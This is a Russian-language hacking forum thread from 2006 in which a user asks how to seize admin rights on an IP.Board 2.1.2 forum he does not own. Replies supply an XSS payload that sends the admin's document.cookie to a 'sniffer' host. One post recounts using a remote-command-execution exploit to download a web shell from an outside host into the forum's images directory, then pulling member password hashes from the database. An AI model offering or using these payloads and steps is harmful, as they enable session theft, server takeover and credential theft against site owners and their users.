Форумы Админские права в Ipb 2.1.2

Discussion in 'Уязвимости CMS/форумов' started by pricol89, 19 Jun 2006.

  1. pricol89

    pricol89 New Member

    Joined:
    12 Jan 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Можно ли как-то завладеть правами в подобном форуме? Объясните как. Дальше сам разберусь...
     
  2. bl4ck-cat

    bl4ck-cat Elder - Старейшина

    Joined:
    17 Jun 2006
    Messages:
    52
    Likes Received:
    12
    Reputations:
    10
    1. можно прочитать кучу статтей по поводу IPB... RTFM
    2. послать админу жалобу с злобным скриптом внутри... по типу такого: <script>img = new Image(); img.src = "http://сниффер/сниффер.php?"+location.host+document.cookie;</script>
     
  3. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Модераторы прошу удалить тему , ибо таких тем навалом в ачате , надо искать и всё.
     
  4. pricol89

    pricol89 New Member

    Joined:
    12 Jan 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Почему же сразу удалить? Просто предлагаю администрации сайта все высказывания на форуме объединять в статьи и обновлять их по ходу поступления новых постов, а не нужные темы, в которых толком ничё не разобрать, а только обсуждение хакеров между собой, просто удалить... или закрыть и переместить в отдельную папку... Рядовому юзеру не очень то понятно о чём тут многие говорят... А в статьях всё бы попорядку писалось... А пытаться выдёргивать из каждого поста что-то нужное не очень просто...

    Предлагаю администрации рассмотреть моё предложение, т.к. будет на много меньше подобных постов.
     
  5. pricol89

    pricol89 New Member

    Joined:
    12 Jan 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Статей много, но подчеркнуть для себя что-то нужное очень трудно, т.к. многое не очень понятно, с чем приходится долго разбираться... Для этого помоему и создна форум... А здесь просто посылают все в Google или почитать "какие-то" статьи... Если пишети про статьи, то давайте полный путь к ним, если знаете... (обращение ко всем)
    А сниффер от античата сойдёт для получения куков? или надо писать свой сниффер? А вообще хочу научиться писать свой... Есть статьи?
     
  6. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    ты что читать разучился , зайди в поиск и кавыряйся тама, может болше 100 тем есть на эту тему.
     
  7. pricol89

    pricol89 New Member

    Joined:
    12 Jan 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Если бы я не пытался искать, то не зашёл бы сюда... Если есть ссылки по данноё тематике, то прошу предоставить... Буду благодарен...
     
  8. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    А че догадатся тяжело..... 2.1.2 ниже 2.1.4 значит все дырки еще не закрыты. Поражаюсь твоей логике.
     
  9. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    php-including IPB вот тебе задача иши .
     
  10. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Блин, набери в яндексе "Взлом Ipb 2.1.2" какие ещё ссылки в студию?! поищи сам... Правильно, как сказал DimaHbl4 всё, что "придумано" для взлома более поздних версий, актуально и для этой.
     
  11. pricol89

    pricol89 New Member

    Joined:
    12 Jan 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Не ну это то ещё понятно... =)
     
  12. bl4ck-cat

    bl4ck-cat Elder - Старейшина

    Joined:
    17 Jun 2006
    Messages:
    52
    Likes Received:
    12
    Reputations:
    10
    парень если ты читал статьи, искал в гугле, и ничего не понял... то кто тебе объяснит?
    зачем лезть туда что непонимаешь???
     
  13. pricol89

    pricol89 New Member

    Joined:
    12 Jan 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Да блин нашёл что-то... вникаю... Тока начал читать... дайте время... не гоните вы так сразу... А то сразу съесть готовы... лучше промолчите, чем писть "юзай поиск"... :(

    Объясните тока одно, как через сниффер завладеть куками? и подходит ли для этого сниффер на античате?
     
  14. bl4ck-cat

    bl4ck-cat Elder - Старейшина

    Joined:
    17 Jun 2006
    Messages:
    52
    Likes Received:
    12
    Reputations:
    10
    http://video.antichat.ru/file187.html
    видео...
     
  15. /-\le][

    /-\le][ New Member

    Joined:
    22 Jun 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Позавчера как раз пришлось эту версию подергать. Сделал всего два шага:
    1. скачал сплоит для 2.1.5 - удаленное выполнение команд
    2. а потом залил шелл, используя командную строку
    GET http://mysite.narod.ru/shell.txt > chat/images.php

    Ну а спомощью шелла , бери из мускула хэши (select * from ibf_members) и т.д.